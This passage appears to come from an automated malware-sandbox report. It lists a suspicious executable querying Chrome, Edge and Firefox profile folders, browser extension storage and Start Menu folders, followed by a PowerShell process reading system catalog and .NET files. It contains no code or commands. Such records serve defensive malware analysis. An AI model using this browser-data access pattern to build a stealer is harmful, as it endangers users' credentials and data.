              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fa VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gu VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hi VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\id VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\OriginTrials VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ko VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fa VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
